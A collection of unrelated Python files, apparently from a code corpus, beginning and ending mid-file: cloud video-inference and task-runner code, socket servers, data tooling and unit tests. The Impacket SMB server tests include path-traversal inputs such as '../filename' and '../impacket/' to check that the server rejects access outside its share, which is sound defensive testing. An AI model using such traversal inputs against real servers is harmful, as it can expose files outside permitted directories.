predictions.append('\n')
batch.clear()
vidcap.release()
#cv2.destroyAllWindows()
return predictions
def main():
task_queue_name = None
task_completed_queue_name = None
try:
task_queue_name = os.environ['SQS_TASK_QUEUE']
task_completed_queue_name = os.environ['SQS_TASK_COMPLETED_QUEUE']
except KeyError:
log.error('Please set the environment variables for SQS_TASK_QUEUE and SQS_TASK_COMPLETED_QUEUE')
sys.exit(1)
# Get the instance information
r = requests.get("http://169.254.169.254/latest/dynamic/instance-identity/document")
r.raise_for_status()
response_json = r.json()
region = response_json.get('region')
instance_id = response_json.get('instanceId')
ec2 = boto3.client('ec2', region_name=region)
s3 = boto3.client('s3', region_name=region)
task_queue = boto3.resource('sqs', region_name=region).get_queue_by_name(QueueName=task_queue_name)
task_completed_queue = boto3.resource('sqs', region_name=region).get_queue_by_name(QueueName=task_completed_queue_name)
log.info('Initialized - instance: %s', instance_id)
prepare_queue = queue.Queue()
inference_queue = queue.Queue(maxsize=FRAME_BATCH)
prepare_worker = threading.Thread(target=prepare, args=(prepare_queue, inference_queue,))
prepare_worker.start()
while True:
for message in task_queue.receive_messages(WaitTimeSeconds=10):
try:
log.info('Message received - instance: %s', instance_id)
ec2.modify_instance_attribute(
InstanceId=instance_id,
DisableApiTermination={ 'Value': True },
)
log.info('Termination protection engaged - instance: %s', instance_id)
message.change_visibility(VisibilityTimeout=600)
log.info('Message visibility updated - instance: %s', instance_id)
# Process the message
doc = json.loads(message.body)
log.info('Message body is loaded - instance: %s', instance_id)
s3.download_file(doc['bucket'], doc['object'], TMP_FILE)
log.info('File is downloaded - instance: %s', instance_id)
log.info('Starting predictions - instance: %s', instance_id)
predictions_for_frames = process_video_from_file(TMP_FILE, prepare_queue, inference_queue)
log.info('Predictions completed - instance: %s', instance_id)
log.info(''.join(e for e in predictions_for_frames))
task_completed_queue.send_message(MessageBody=''.join(e for e in predictions_for_frames))
log.info('Task completed msg sent - instance: %s', instance_id)
message.delete()
log.info('Message deleted - instance: %s', instance_id)
ec2.modify_instance_attribute(
InstanceId=instance_id,
DisableApiTermination={ 'Value': False },
)
log.info('Termination protection disengaged - instance: %s', instance_id)
if os.path.exists(TMP_FILE):
os.remove(TMP_FILE)
except:
log.error('Problem processing message: %s - instance: %s', sys.exc_info()[0], instance_id)
if __name__ == '__main__':
main()
|
tether_task_runner.py
|
#!/usr/bin/env python
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import logging
import sys
import threading
import traceback
import weakref
import avro.tether.tether_task
import avro.tether.util
from avro import ipc
try:
import BaseHTTPServer as http_server # type: ignore
except ImportError:
import http.server as http_server # type: ignore
__all__ = ["TaskRunner"]
class TaskRunnerResponder(ipc.Responder):
"""
The responder for the tethered process
"""
def __init__(self,runner):
"""
Param
----------------------------------------------------------
runner - Instance of TaskRunner
"""
ipc.Responder.__init__(self, avro.tether.tether_task.inputProtocol)
self.log=logging.getLogger("TaskRunnerResponder")
# should we use weak references to avoid circular references?
# We use weak references b\c self.runner owns this instance of TaskRunnerResponder
if isinstance(runner,weakref.ProxyType):
self.runner=runner
else:
self.runner=weakref.proxy(runner)
self.task=weakref.proxy(runner.task)
def invoke(self, message, request):
try:
if message.name=='configure':
self.log.info("TetherTaskRunner: Recieved configure")
self.task.configure(request["taskType"],request["inSchema"],request["outSchema"])
elif message.name=='partitions':
self.log.info("TetherTaskRunner: Recieved partitions")
try:
self.task.set_partitions(request["partitions"])
except Exception as e:
self.log.error("Exception occured while processing the partitions message: Message:\n"+traceback.format_exc())
raise
elif message.name=='input':
self.log.info("TetherTaskRunner: Recieved input")
self.task.input(request["data"],request["count"])
elif message.name=='abort':
self.log.info("TetherTaskRunner: Recieved abort")
self.runner.close()
elif message.name=='complete':
self.log.info("TetherTaskRunner: Recieved complete")
self.task.complete()
self.task.close()
self.runner.close()
else:
self.log.warning("TetherTaskRunner: recieved unknown message {0}".format(message.name))
except Exception as e:
self.log.error("Error occured while processing message: {0}".format(message.name))
emsg=traceback.format_exc()
self.task.fail(emsg)
return None
def HTTPHandlerGen(runner):
"""
This is a class factory for the HTTPHandler. We need
a factory because we need a reference to the runner
Parameters
-----------------------------------------------------------------
runner - instance of the task runner
"""
if not(isinstance(runner,weakref.ProxyType)):
runnerref=weakref.proxy(runner)
else:
runnerref=runner
class TaskRunnerHTTPHandler(http_server.BaseHTTPRequestHandler):
"""Create a handler for the parent.
"""
runner=runnerref
def __init__(self,*args,**param):
"""
"""
http_server.BaseHTTPRequestHandler.__init__(self,*args,**param)
def do_POST(self):
self.responder =TaskRunnerResponder(self.runner)
call_request_reader = ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
return TaskRunnerHTTPHandler
class TaskRunner(object):
"""This class ties together the server handling the requests from
the parent process and the instance of TetherTask which actually
implements the logic for the mapper and reducer phases
"""
def __init__(self,task):
"""
Construct the runner
Parameters
---------------------------------------------------------------
task - An instance of tether task
"""
self.log=logging.getLogger("TaskRunner:")
if not(isinstance(task, avro.tether.tether_task.TetherTask)):
raise ValueError("task must be an instance of tether task")
self.task=task
self.server=None
self.sthread=None
def start(self,outputport=None,join=True):
"""
Start the server
Parameters
-------------------------------------------------------------------
outputport - (optional) The port on which the parent process is listening
for requests from the task.
- This will typically be supplied by an environment variable
we allow it to be supplied as an argument mainly for debugging
join - (optional) If set to fault then we don't issue a join to block
until the thread excecuting the server terminates.
This is mainly for debugging. By setting it to false,
we can resume execution in this thread so that we can do additional
testing
"""
port = avro.tether.util.find_port()
address=("localhost",port)
def thread_run(task_runner=None):
task_runner.server = http_server.HTTPServer(address, HTTPHandlerGen(task_runner))
task_runner.server.allow_reuse_address = True
task_runner.server.serve_forever()
# create a separate thread for the http server
sthread=threading.Thread(target=thread_run,kwargs={"task_runner":self})
sthread.start()
self.sthread=sthread
# This needs to run in a separat thread b\c serve_forever() blocks
self.task.open(port,clientPort=outputport)
# wait for the other thread to finish
if (join):
self.task.ready_for_shutdown.wait()
self.server.shutdown()
# should we do some kind of check to make sure it exits
self.log.info("Shutdown the logger")
# shutdown the logging
logging.shutdown()
def close(self):
"""
Handler for the close message
"""
self.task.close()
if __name__ == '__main__':
# TODO::Make the logging level a parameter we can set
# logging.basicConfig(level=logging.INFO,filename='/tmp/log',filemode='w')
logging.basicConfig(level=logging.INFO)
if (len(sys.argv)<=1):
print("Error: tether_task_runner.__main__: Usage: tether_task_runner task_package.task_module.TaskClass")
raise ValueError("Usage: tether_task_runner task_package.task_module.TaskClass")
fullcls=sys.argv[1]
mod,cname=fullcls.rsplit(".",1)
logging.info("tether_task_runner.__main__: Task: {0}".format(fullcls))
modobj=__import__(mod,fromlist=cname)
taskcls=getattr(modobj,cname)
task=taskcls()
runner=TaskRunner(task=task)
runner.start()
|
test_network.py
|
import random
import socket
import threading
import unittest
import telethon.network.authenticator as authenticator
from telethon.extensions import TcpClient
from telethon.network import Connection
def run_server_echo_thread(port):
def server_thread():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(('', port))
s.listen(1)
connection, address = s.accept()
with connection:
data = connection.recv(16)
connection.send(data)
server = threading.Thread(target=server_thread)
server.start()
class NetworkTests(unittest.TestCase):
@unittest.skip("test_tcp_client needs fix")
async def test_tcp_client(self):
port = random.randint(50000, 60000) # Arbitrary non-privileged port
run_server_echo_thread(port)
msg = b'Unit testing...'
client = TcpClient()
await client.connect('localhost', port)
await client.write(msg)
self.assertEqual(msg, await client.read(15),
msg='Read message does not equal sent message')
client.close()
@unittest.skip("Some parameters changed, so IP doesn't go there anymore.")
async def test_authenticator(self):
transport = Connection('149.154.167.91', 443)
self.assertTrue(await authenticator.do_authentication(transport))
transport.close()
|
test_smbserver.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2021 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Basic unit tests for the SMB Server.
#
# Author:
# Martin Gallo (@martingalloar)
#
import unittest
from time import sleep
from os.path import exists, join
from os import mkdir, rmdir, remove
from multiprocessing import Process
from six import StringIO, BytesIO, b
from impacket.smbserver import isInFileJail, SimpleSMBServer
from impacket.smbconnection import SMBConnection, SessionError, compute_lmhash, compute_nthash
class SMBServerUnitTests(unittest.TestCase):
"""Unit tests for the SMBServer
"""
def test_isInFileJail(self):
"""Test validation of common prefix path.
"""
jail_path = "/tmp/jail_path"
self.assertTrue(isInFileJail(jail_path, "filename"))
self.assertTrue(isInFileJail(jail_path, "./filename"))
self.assertTrue(isInFileJail(jail_path, "../jail_path/filename"))
self.assertFalse(isInFileJail(jail_path, "/filename"))
self.assertFalse(isInFileJail(jail_path, "/tmp/filename"))
self.assertFalse(isInFileJail(jail_path, "../filename"))
self.assertFalse(isInFileJail(jail_path, "../../filename"))
class SimpleSMBServerFuncTests(unittest.TestCase):
"""Pseudo functional tests for the SimpleSMBServer.
These are pseudo functional as we're using our own SMBConnection classes. For a complete functional test
we should (and can) use for example Samba's smbclient or similar.
"""
address = "127.0.0.1"
port = 1445
username = "UserName"
password = "Password"
domain = "DOMAIN"
lmhash = compute_lmhash(password)
nthash = compute_nthash(password)
share_name = "share"
share_path = "jail_dir"
share_file = "jail_file"
share_new_file = "jail_new_file"
share_unjailed_file = "unjailed_new_file"
share_new_content = "some content"
def setUp(self):
"""Creates folders and files required for testing the list, put and get functionality.
"""
if not exists(self.share_path):
mkdir(self.share_path)
for f in [self.share_file, self.share_new_file]:
if not exists(join(self.share_path, f)):
with open(join(self.share_path, f), "a") as fd:
fd.write(self.share_new_content)
def tearDown(self):
"""Removes folders and files used for testing.
"""
for f in [self.share_file, self.share_new_file]:
if exists(join(self.share_path, f)):
remove(join(self.share_path, f))
if exists(self.share_unjailed_file):
remove(self.share_unjailed_file)
if exists(self.share_path):
rmdir(self.share_path)
self.stop_smbserver()
def get_smbserver(self):
return SimpleSMBServer(listenAddress=self.address, listenPort=int(self.port))
def start_smbserver(self, server):
"""Starts the SimpleSMBServer process.
"""
self.server_process = Process(target=server.start)
self.server_process.start()
def stop_smbserver(self):
"""Stops the SimpleSMBServer process and wait for insider threads to join.
"""
self.server_process.terminate()
sleep(0.5)
def test_smbserver_login(self):
"""Test authentication using password and LM/NTHash login.
"""
server = self.get_smbserver()
server.addCredential(self.username, 0, self.lmhash, self.nthash)
self.start_smbserver(server)
# Valid password login
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, self.password)
client.close()
# Valid hash login
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, '', lmhash=self.lmhash, nthash=self.nthash)
client.close()
# Invalid password login
with self.assertRaises(SessionError):
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, 'SomeInvalidPassword')
client.close()
# Invalid username login
with self.assertRaises(SessionError):
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login("InvalidUser", "", lmhash=self.lmhash, nthash=self.nthash)
client.close()
# Invalid hash login
with self.assertRaises(SessionError):
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, "", lmhash=self.nthash, nthash=self.lmhash)
client.close()
def test_smbserver_share_list(self):
"""Test listing files in a shared folder.
"""
server = SimpleSMBServer(listenAddress=self.address, listenPort=int(self.port))
server.addCredential(self.username, 0, self.lmhash, self.nthash)
server.addShare(self.share_name, self.share_path)
self.start_smbserver(server)
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, self.password)
client.listPath(self.share_name, "/")
# Check path traversal in list as in #1066
with self.assertRaises(SessionError):
client.listPath(self.share_name, "../impacket/")
client.close()
def test_smbserver_share_put(self):
"""Test writing files to a shared folder.
"""
server = SimpleSMBServer(listenAddress=self.address, listenPort=int(self.port))
server.addCredential(self.username, 0, self.lmhash, self.nthash)
server.addShare(self.share_name, self.share_path)
self.start_smbserver(server)
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, self.password)
local_file = StringIO(self.share_new_content)
client.putFile(self.share_name, self.share_new_file, local_file.read)
self.assertTrue(exists(join(self.share_path, self.share_new_file)))
with open(join(self.share_path, self.share_new_file), "r") as fd:
self.assertEqual(fd.read(), self.share_new_content)
# Check path traversal in put as in #1066
with self.assertRaises(SessionError):
client.putFile(self.share_name, join("..", self.share_unjailed_file), local_file.read)
self.assertFalse(exists(self.share_unjailed_file))
client.close()
def test_smbserver_share_get(self):
"""Test reading files from a shared folder.
"""
server = SimpleSMBServer(listenAddress=self.address, listenPort=int(self.port))
server.addCredential(self.username, 0, self.lmhash, self.nthash)
server.addShare(self.share_name, self.share_path)
self.start_smbserver(server)
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, self.password)
local_file = BytesIO()
client.getFile(self.share_name, self.share_file, local_file.write)
local_file.seek(0)
self.assertEqual(local_file.read(), b(self.share_new_content))
# Check unexistent file
with self.assertRaises(SessionError):
client.getFile(self.share_name, "unexistent", local_file.write)
client.close()
if __name__ == "__main__":
loader = unittest.TestLoader()
suite = unittest.TestSuite()
suite.addTests(loader.loadTestsFromTestCase(SMBServerUnitTests))
suite.addTests(loader.loadTestsFromTestCase(SimpleSMBServerFuncTests))
unittest.main(defaultTest='suite')
|
generate_tfrecords.py
|
from __future__ import print_function
import os
import numpy as np
import h5py
import cv2
import tensorflow as tf
import sys
import threading
import time
import glob
import argparse
parser = argparse.ArgumentParser(description="Creates .tfrecord")
parser.add_argument('--path', type=str, help="The path where to look for .h5py files. Use @ for * in the path.", required=True)
parser.add_argument('--out', type=str, help="The path where to write the tfrecords.", required=True)
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = ''
folder_path = args.path
write_folder_path = args.out
image_size = (512, 512)
def resize_image(img):
return cv2.resize(img, image_size)
def serialize_tfrecord(color, normal):
feature = {}
feature['colors'] = tf.train.Feature(float_list=tf.train.FloatList(value=color.reshape(-1)))
feature['normals'] = tf.train.Feature(float_list=tf.train.FloatList(value=normal.reshape(-1)))
example = tf.train.Example(features=tf.train.Features(feature=feature))
serialized = example.SerializeToString()
return serialized
def deserialize_tfrecord(example_proto):
keys_to_features = {'colors': tf.FixedLenFeature([], tf.string),
'normals': tf.FixedLenSequenceFeature([], dtype=tf.float32, allow_missing=True)}
parsed_features = tf.parse_single_example(example_proto, keys_to_features)
color = tf.cast(tf.reshape(tf.decode_raw(parsed_features['colors'], tf.uint8), (512, 512, 3)), tf.float32)
normal = tf.reshape(parsed_features['normals'], (512, 512, 3))
return (color, normal)
list_of_open_elements = []
list_of_done_elements = []
lock_open = threading.Lock()
lock_done = threading.Lock()
lock_writer = threading.Lock()
lock_writer_nr = threading.Lock()
sem_open = threading.Semaphore(0)
sem_done = threading.Semaphore(0)
done = False
done_counter = 0
global_write_counter = 0
def normalizing_fct():
global list_of_open_elements, sem_open, done_counter
counter_here = 0
while not done:
shouldSleep = True
while shouldSleep and not done:
try:
lock_done.acquire()
size = len(list_of_done_elements)
lock_done.release()
finally:
pass
shouldSleep = size > 100
if shouldSleep:
time.sleep(0.25)
if done:
break
sem_open.acquire()
if done:
break
try:
lock_open.acquire()
path = list_of_open_elements.pop()
lock_open.release()
finally:
pass
time.sleep(0.05)
try:
with h5py.File(path, 'r') as data:
if "colors" in data.keys() and "normals" in data.keys():
raw_image = np.array(data["colors"])
raw_image = raw_image[:, :, :3]
color_o = (raw_image / 255.0)
normal_o = np.array(data["normals"])
# converting normal images
if np.any(np.isinf(normal_o)) or np.min(normal_o) < 0:
print("This .hdf5 container contains an invalid normal img: {}".format(path))
continue
counter_here += 1
else:
continue
except IOError:
continue
lock_done.acquire()
list_of_done_elements.append([color_o, normal_o])
done_counter += 1
lock_done.release()
color_o = None
normal_o = None
sem_done.release()
writer_nr = 0
def write_fct():
global sem_done, global_write_counter, writer_nr
start_new_writer = True
writer = None
write_counter = 0
options = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.GZIP)
while not done:
if start_new_writer:
lock_writer_nr.acquire()
if writer is not None:
writer.close()
writer = None
writer = tf.python_io.TFRecordWriter(
os.path.join(write_folder_path, "train_{}.tfrecord".format(writer_nr)), options=options)
print("Start new tf record file")
writer_nr += 1
start_new_writer = False
lock_writer_nr.release()
sem_done.acquire()
try:
lock_done.acquire()
if len(list_of_done_elements) > 0:
c, n = list_of_done_elements.pop()
else:
lock_done.release()
continue
lock_done.release()
finally:
pass
serialized = serialize_tfrecord(c, n)
lock_writer.acquire()
writer.write(serialized)
global_write_counter += 1
lock_writer.release()
serialized = None
c = None
n = None
write_counter += 1
if write_counter % 500 == 0:
start_new_writer = True
print("Done writing fct: " + str(write_counter))
writer.close()
paths = glob.glob(os.path.join(folder_path.replace("@", "*"), "*.hdf5"))
paths.sort()
paths.reverse()
threads = []
normalizer_workers = 1
writer_workers = 1
for i in range(writer_workers):
t = threading.Thread(target=write_fct)
t.daemon = True
threads.append(t)
t.start()
for i in range(normalizer_workers):
# Create each thread, passing it its chunk of numbers to factor
# and output dict.
t = threading.Thread(target=normalizing_fct)
t.daemon = True
threads.append(t)
t.start()
counter = len(paths)
for path in paths:
lenght_ok = True
while lenght_ok:
lock_done.acquire()
lenght_now = len(list_of_done_elements)
lock_done.release()
lenght_ok = False
if lenght_now > 15:
time.sleep(0.1)
lenght_ok = True
lock_open.acquire()
list_of_open_elements.append(path)
lock_open.release()
sem_open.release()
while not done:
lock_done.acquire()
lenght_now = len(list_of_done_elements)
lock_done.release()
lock_open.acquire()
length_2 = len(list_of_open_elements)
lock_open.release()
sys.stdout.flush()
time.sleep(0.25)
if lenght_now + length_2 == 0:
done = True
break
print(' ')
for i in range(writer_workers):
sem_done.release()
for i in range(writer_workers):
threads[i].join()
print("Writer closed")
sem_open.release()
for t in threads:
t.join()
exit()
|
Perf_runner.py
|
#!/usr/bin/env python3
import os
import argparse
import time
import sys
from threading import Thread, Lock
global txns
global clients
clients = 100
txns = 100
# ==================== Notes and information ====================
# This script will run multiple instances (threaded) of the the Perf_Add_nyms.py script or the Perf_get_nyms.py. The
# command line parameters for each script are different and can be set from this script without modifying Add_nyms or
# Get_nyms scripts.
# The settings for Perf runner are 'clients' and 'txns'. Clients is the number of threads (or client machines) to use,
# the txns indicates how many transactions will run per client (thread). These settings are specific to Perf_runner.py
#
# The command line for both performance scripts is created in the 'command' variable found below. The default setting
# for Perf_Add_nyms.py uses the -n and -s parameters to specify the number of threads and clients to use. The value
# from clients is iterated through and uses 'i' to track which iteration is processing.
# The default vaiables for the Add_nyms script will be used. If any of the default settings for Add_nyms or Get_nyms
# needs to be modified, add the changes here to the perf runner by modifying the 'command' variable.
# ================================================================
# Example:
# Run Perf_Add_nyms.py: python3.6 Perf_runner.py -a
# Run Perf_gert_nyms.py using 3 clients (threads) - by setting clients to 3: python3.6 Perf_runner.py -g
parser = argparse.ArgumentParser(description='This script will create multiple threads of the Perf_Add_nyms.py or '
'the Perf_get_nyms.py.')
parser.add_argument('-a', help='Use this parameter to start Perf_Add_nyms.py', action='store_true',
default=False, required=False)
parser.add_argument('-g', help='Use this parameter to start Perf_get_nyms.py', action='store_true',
default=False, required=False)
# parser.print_help()
results = parser.parse_args()
if results.a:
results.a = 'Perf_Add_nyms.py'
if results.g:
results.g = 'Perf_get_nyms.py'
def run_test(i, lock):
print("This is a test : " + repr(results.g))
print("This is a test : " + repr(results.a))
if results.a:
# The value for -n is the 'txns' variable at the top of this script
command = 'python3 ' + results.a + ' -n ' + str(txns) + ' -s ' + repr(i)
elif results.g:
# The default values for -d -t and -g in get_nym will be used
command = 'python3 ' + results.g + ' -s ' + repr(clients) + ' -d nym_files'
else:
print("\n\nPlease specify a script to use or run Perf_runner.py -h for additional information")
sys.exit(1)
with lock:
print("Starting thread {}".format(i))
# Run the command
# print(command)
os.system(command)
with lock:
print("Thread {} stopped".format(i))
# Create threads
lock = Lock()
# Start Time
# timeBegin = datetime.now()
overmind_start_time = time.time()
# get the number of clients (threads) to create
threads = [Thread(target=run_test, args=(i, lock)) for i in range(clients)]
# Start threads
for x in threads:
x.start()
# Stop threads
for x in threads:
x.join()
# Total Time
totalTime = time.time() - overmind_start_time
hours = totalTime / 3600
totalTime = 3600 * hours
minutes = totalTime / 60
seconds = 60 * minutes
ttl_txns = clients * txns
ttl_seconds = int((hours * 3600) + (minutes * 60) + seconds)
try:
txns_per_second = int(ttl_txns / ttl_seconds)
except Exception as E:
txns_per_second = None
print("There is too small test run time that causes an error: ", E)
print("\n ----------- Total time to run the test: %dh:%dm:%ds" % (hours, minutes, seconds) + " -----------")
print("\n Clients = " + str(clients))
print("\n Transaction per client = " + str(txns))
print("\n Total transactions requested = " + str(ttl_txns))
print("\n Estimated transactions per second = " + str(txns_per_second))
tm = time.strftime("%d-%m-%Y_%H-%M-%S")
file = open("test_results_time_" + tm + ".log", "w")
file.write("\n ----------- Total time to run the test: %dh:%dm:%ds" % (hours, minutes, seconds) + " -----------\n")
file.write("\n Clients = " + str(clients))
file.write("\n Transaction per client = " + str(txns))
file.write("\n Total transactions requested = " + str(ttl_txns))
file.write("\n Estimated transactions per second = " + str(txns_per_second))
file.close()
|
server.py
|
from gettext import find
import socket
import threading
import spotipy
from spotipy.oauth2 import SpotifyOAuth
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def init_auth_manager():
with open('token-data_server.txt', 'r') as file:
cred_data = file.readlines()
scope = 'user-library-read user-read-playback-state user-modify-playback-state user-read-currently-playing'
auth_manager = SpotifyOAuth(
client_id=cred_data[0].strip(),
client_secret=cred_data[1].strip(),
redirect_uri=cred_data[2].strip(),
scope=scope)
return auth_manager
"""
Asks user for which playback device they'd like and returns the device id.
"""
def select_device(avail_devices):
device_names = [*avail_devices]
device_names = list(avail_devices.keys())
if len(device_names) == 0:
return
user_input = -1
while user_input-1 not in range(len(device_names)):
try:
print()
for i in range(len(device_names)):
print(f"({i+1}) {device_names[i]}")
print()
print("Enter the number that corresponds with your player.")
user_input = int(input("> "))
except ValueError:
print("[ERROR] Please enter a valid number.")
return avail_devices[device_names[user_input-1]]
"""
Calls API to grab the available devices user can interact with.
"""
def get_avail_devices(sp):
avail_devices = dict()
results = sp.devices()
# print(len(results['devices']))
if len(results['devices']) != 0:
for i in range(len(results['devices'])):
avail_devices[results['devices'][i]['name']] = results['devices'][i]['id']
else:
print("[ERROR] There are no available devices.")
return avail_devices
"""
Plays a provided track on a provided device.
"""
def play_track(sp, device_id, track_id):
uris_list = []
uris_list.append(track_id)
sp.start_playback(device_id=device_id, uris=uris_list)
def handle_client(conn, addr, sp, device_id):
print(f"[NEW CONNECTION] {addr} connected.")
# conn.send("[CONNECTED] You connected to the host".encode(FORMAT))
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
match msg:
case "playing":
track_info = sp.currently_playing()
track_name = track_info['item']['name']
track_artist = track_info['item']['album']['artists'][0]['name']
track_album = track_info['item']['album']['name']
conn.send(f"Name: {track_name} | Artist: {track_artist} | Album: {track_album}".encode(FORMAT))
if ("https://open.spotify.com/track/") in msg:
play_track(sp, device_id, msg)
track_info = sp.currently_playing()
track_name = track_info['item']['name']
track_artist = track_info['item']['album']['artists'][0]['name']
conn.send(f"[ADDED] ({track_name} by {track_artist}) added to queue.".encode(FORMAT))
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
# Placed API build inside of start fuhnction for organization
auth_manager = init_auth_manager()
sp = spotipy.Spotify(auth_manager=auth_manager)
# Host must select device player when initializing server.
avail_devices = get_avail_devices(sp)
device_id = select_device(avail_devices)
while True:
if device_id == None:
break
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr, sp, device_id))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.active_count() - 1}")
print("[CLOSING] server is stopping...")
print("[STARTING] server is starting...")
start()
|
tt_server.py
|
from socket import *
import datetime
import time
import threading
class ThreadedServer():
def listenToClient(self, client, addr):
userName = (client.recv(1024)).decode("utf-8")
print(userName, "logged in")
while True:
counter = 0
answers = []
questions = []
choice = (client.recv(1024)).decode("utf-8")
if choice == "0":
print(userName, "left the server")
client.close()
return
else:
if choice == "1":
testName = "Networks test"
elif choice == "2":
testName = "Russian test"
elif choice == "3":
testName = "Math test"
print(userName, "started", testName)
if choice == "1":
questions = self.questions1
elif choice == "2":
questions = self.questions2
else:
questions = self.questions3
for i in range(6):
client.send(questions[counter].encode())
message = client.recv(1024)
if message == "exit":
print(addr, " is closed")
client.close()
else:
answers.append(message.decode("utf-8").upper())
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print(userName, "give answer", answers[counter], "for question", counter + 1,
"timestamp:",
st)
counter += 1
self.assessment(addr, answers, userName, int(choice), client, testName)
def assessment(self, addr, answers, userName, choice, client, testName):
point = 0
print(userName, "answers for", testName, answers)
if choice == 1:
if (answers[0] == "A"):
point += 1
if (answers[1] == "A"):
point += 1
if (answers[2] == "A"):
point += 1
if (answers[3] == "C"):
point += 1
if (answers[4] == "D"):
point += 1
if (answers[5] == "A"):
point += 1
elif choice == 2:
if (answers[0] == "A"):
point += 1
if (answers[1] == "A"):
point += 1
if (answers[2] == "A"):
point += 1
if (answers[3] == "A"):
point += 1
if (answers[4] == "A"):
point += 1
if (answers[5] == "A"):
point += 1
elif choice == 3:
if (answers[0] == "B"):
point += 1
if (answers[1] == "B"):
point += 1
if (answers[2] == "B"):
point += 1
if (answers[3] == "B"):
point += 1
if (answers[4] == "B"):
point += 1
if (answers[5] == "B"):
point += 1
if (point < 2):
success_comment = "Mark is 2"
elif (point < 4):
success_comment = "Mark is 3"
elif (point <= 5):
success_comment = "Mark is 4"
else:
success_comment = "Mark is 5"
client.send(("Your result of " + testName + " " + str(point) + "/6 | " + success_comment).encode())
result = "Socket Information: " + str(addr[0]) + ":" + str(addr[1]) + " | Username: " + userName \
+ " | Result:" + str(point) + "/6 | " + success_comment
print(result)
return result
def __init__(self, serverPort):
with open('questions.txt') as inp:
self.sets = inp.read().split("FINISH")
self.questions1 = self.sets[0].split("''',")
self.questions2 = self.sets[1].split("''',")
self.questions3 = self.sets[2].split("''',")
self.answers = []
try:
self.serverSocket = socket(AF_INET, SOCK_STREAM)
except:
print("Socket cannot be created!!!")
exit(1)
print("Socket is created...")
try:
self.serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
except:
print("Socket cannot be used!!!")
exit(1)
print("Socket is being used...")
try:
self.serverSocket.bind(('', serverPort))
except:
print("Binding cannot de done!!!")
exit(1)
print("Binding is done...")
try:
self.serverSocket.listen(1)
except:
print("Server cannot listen!!!")
exit(1)
print("The server is ready to receive")
while True:
connectionSocket, addr = self.serverSocket.accept()
threading.Thread(target=self.listenToClient, args=(connectionSocket, addr)).start()
if __name__ == "__main__":
serverPort = 5006
ThreadedServer(serverPort)
|
test_transmission.py
|
from HaPPPy.Transmission.TransmissionCalculator import TransmissionCalculator
from threading import Thread
from scipy.constants import codata
import threading
import unittest
import pytest
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
_x = []
_psi_plot = []
_V = []
class TransmissionTestSuite(unittest.TestCase):
"""
Set of validation test that ensure the modules does not accept
invalid or corrupt inputs.
"""
def test_validation_does_not_allow_negative_electron_energies(self):
# Assemble
E = -1
dx = 0.1
barrier = np.array(20+np.zeros(3000))
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results:
transmission_calculator.calculate_transmission(E, barrier, dx)
# Assert
self.assertTrue("Electron energy must be greater than 0." in str(exception_results.value))
def test_validation_does_not_allow_electron_energies_bigger_than_potential(self):
# Assemble
E = 25
dx = 0.1
barrier = np.array(20+np.zeros(3000))
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results:
transmission_calculator.calculate_transmission(E, barrier, dx)
# Assert
self.assertTrue("Electron energy cannot be bigger than max potential value." in str(exception_results.value))
def test_validation_does_not_allow_invalid_potential(self):
# Assemble
E = 25
dx = 0.1
barrier = [np.array(20+np.zeros(3000)), np.array(20+np.zeros(3000))]
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results1:
transmission_calculator.calculate_transmission(E, barrier, dx)
with pytest.raises(ValueError) as exception_results2:
transmission_calculator.calculate_transmission(E, "some string", dx)
# Assert
self.assertTrue("The potential must be an array of one dimension" in str(exception_results1.value))
self.assertTrue("The potential must be an array of one dimension" in str(exception_results2.value))
def test_validation_does_not_allow_invalid_dx(self):
# Assemble
E = 10
barrier = np.array(20+np.zeros(3000))
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results1:
